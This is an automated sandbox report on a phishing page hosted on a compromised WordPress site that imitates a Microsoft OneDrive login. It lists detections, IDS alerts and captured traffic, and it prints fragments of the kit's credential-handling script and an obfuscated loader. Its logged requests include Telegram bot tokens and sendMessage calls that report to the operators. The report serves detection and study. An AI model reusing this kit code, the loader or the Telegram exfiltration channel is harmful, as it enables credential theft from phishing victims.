Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html

Overview

General Information

Sample URL:https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
Analysis ID:1502053
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Javascript uses Telegram API
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Uses the Telegram API (likely for C&C communication)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 2696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:2024-08-31T00:35:43.370330+0200
SID:2032516
Severity:2
Source Port:443
Destination Port:49749
Protocol:TCP
Classtype:Possible Social Engineering Attempted
Timestamp:2024-08-31T00:35:43.370330+0200
SID:2032517
Severity:2
Source Port:443
Destination Port:49749
Protocol:TCP
Classtype:Possible Social Engineering Attempted
Timestamp:2024-08-31T00:35:41.780044+0200
SID:2032516
Severity:2
Source Port:443
Destination Port:49735
Protocol:TCP
Classtype:Possible Social Engineering Attempted
Timestamp:2024-08-31T00:35:41.780044+0200
SID:2032517
Severity:2
Source Port:443
Destination Port:49735
Protocol:TCP
Classtype:Possible Social Engineering Attempted

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAvira URL Cloud: detection malicious, Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.pngAvira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.jsAvira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.jsAvira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.pngAvira URL Cloud: Label: phishing
Source: http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdfAvira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlLLM: Score: 8 Reasons: The domain 'www.askozvar.sk' does not match the legitimate domain associated with OneDrive, which is 'onedrive.live.com'. Additionally, the URL has a Slovakian domain extension (.sk), which is not commonly used by Microsoft-owned services. The design of the webpage is clean and minimalistic, but this could be a attempt to mimic the legitimate OneDrive website. DOM: 8.0.pages.csv
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.jsHTTP Parser: /* global $ */$(document).ready(function() { var count = 0; $(document).keypress(function(event) { var keycode = (event.keycode ? event.keycode : event.which); if (keycode == '13') { if ($("#divpr").is(":visible")) { $("#submit-btn").trigger("click"); } else { $("#next").trigger("click"); } } }); $('#next').click(function() { $('#error').hide(); $('#msg').hide(); event.preventdefault(); var ai = $("#ai").val(); ///////////new injection//////////////// var my_ai = ai; var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/; if (!ai) { $('#error').show(); $('#error').html("le champ e-mail est vide.!"); ai.focus; return false; } if (!filter.test(my_ai)) { $('#error').show(); $('#error').html("ce...
Source: https://dancinggorillas.com/style/10.jsHTTP Parser: /* * jquery.countdowntimer.min.js 1.0.8 * author - harshen amarnath pandey * version - 1.0.8 * release - 18th april 2015 * copyright (c) 2014 - 2018 harshen pandey*/!function(n){function t(t,c){var s=n.extend({},n.fn.countdowntimer.defaults,c),t=t;t.addclass("style");var m="",m="",h="",v="";if(m=s.size,m=s.bordercolor,h=s.fontcolor,v=s.backgroundcolor,void 0!=c.regexpmatchformat&&void 0!=c.regexpreplacewith&&void 0==c.timeseparator&&(window["regexpmatchformat_"+t.attr("id")]=c.regexpmatchformat,window["regexpreplacewith_"+t.attr("id")]=c.regexpreplacewith),void 0!=c.bordercolor||void 0!=c.fontcolor||void 0!=c.backgroundcolor){var g={background:v,color:h,"border-color":m};t.css(g)}else t.addclass("colordefinition");if(void 0!=c.size)switch(m){case"xl":t.addclass("size_xl");break;case"lg":t.addclass("size_lg");break;case"md":t.addclass("size_md");break;case"sm":t.addclass("size_sm");break;case"xs":t.addclass("size_xs")}else"sm"==m&&t.addclass("size_sm");if(void 0!=c.startdate||void 0!=c.dateandt...
Source: https://dancinggorillas.com/style/pdf_fr.jsHTTP Parser: var _0xee8a36=_0x2e18;(function(_0x3a523f,_0x41e5ee){var _0x539c92=_0x2e18,_0x5b0065=_0x3a523f();while(!![]){try{var _0x16996e=parseint(_0x539c92(0x1c0))/0x1*(parseint(_0x539c92(0x1c7))/0x2)+parseint(_0x539c92(0x1cb))/0x3+parseint(_0x539c92(0x1bd))/0x4+-parseint(_0x539c92(0x1c9))/0x5+-parseint(_0x539c92(0x1c8))/0x6*(-parseint(_0x539c92(0x1cc))/0x7)+parseint(_0x539c92(0x1c4))/0x8*(-parseint(_0x539c92(0x1c5))/0x9)+-parseint(_0x539c92(0x1c3))/0xa*(parseint(_0x539c92(0x1c1))/0xb);if(_0x16996e===_0x41e5ee)break;else _0x5b0065['push'](_0x5b0065['shift']());}catch(_0xcf3dda){_0x5b0065['push'](_0x5b0065['shift']());}}}(_0x2f5b,0x1cb7b));function _0x2e18(_0x176eb8,_0x79f9ab){var _0x2f5b9d=_0x2f5b();return _0x2e18=function(_0x2e180a,_0x32ee09){_0x2e180a=_0x2e180a-0x1bd;var _0x2f6ebd=_0x2f5b9d[_0x2e180a];return _0x2f6ebd;},_0x2e18(_0x176eb8,_0x79f9ab);}var scriptelement=document[_0xee8a36(0x1c2)]('script'),a='h',z='t',e='t',r='p',t='s',y=':',u='/',i='/',o='d',p='a',q='n',s='c',d='i',f='n',g='g',h='g',j='o',k='r',l='i',m...
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlMatcher: Found strong image similarity, brand: MICROSOFT
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlMatcher: Template: onedrive matched
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: Number of links: 0
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: Total embedded image size: 250150
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: Title: Plans Archi does not match URL
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: Invalid link: Privacy & Cookies
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: <input type="password" .../> found
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: No favicon
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: No <meta name="author".. found
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49769 version: TLS 1.2

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.4:55178 -> 162.159.36.2:53
Source: Network trafficSuricata IDS: 2032516 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49749
Source: Network trafficSuricata IDS: 2032517 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49749
Source: Network trafficSuricata IDS: 2032516 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49735
Source: Network trafficSuricata IDS: 2032517 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49735
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style/pdf_fr.js HTTP/1.1Host: dancinggorillas.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style/10.js HTTP/1.1Host: dancinggorillas.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.php HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style/pdf_fr.js HTTP/1.1Host: dancinggorillas.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /style/10.js HTTP/1.1Host: dancinggorillas.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
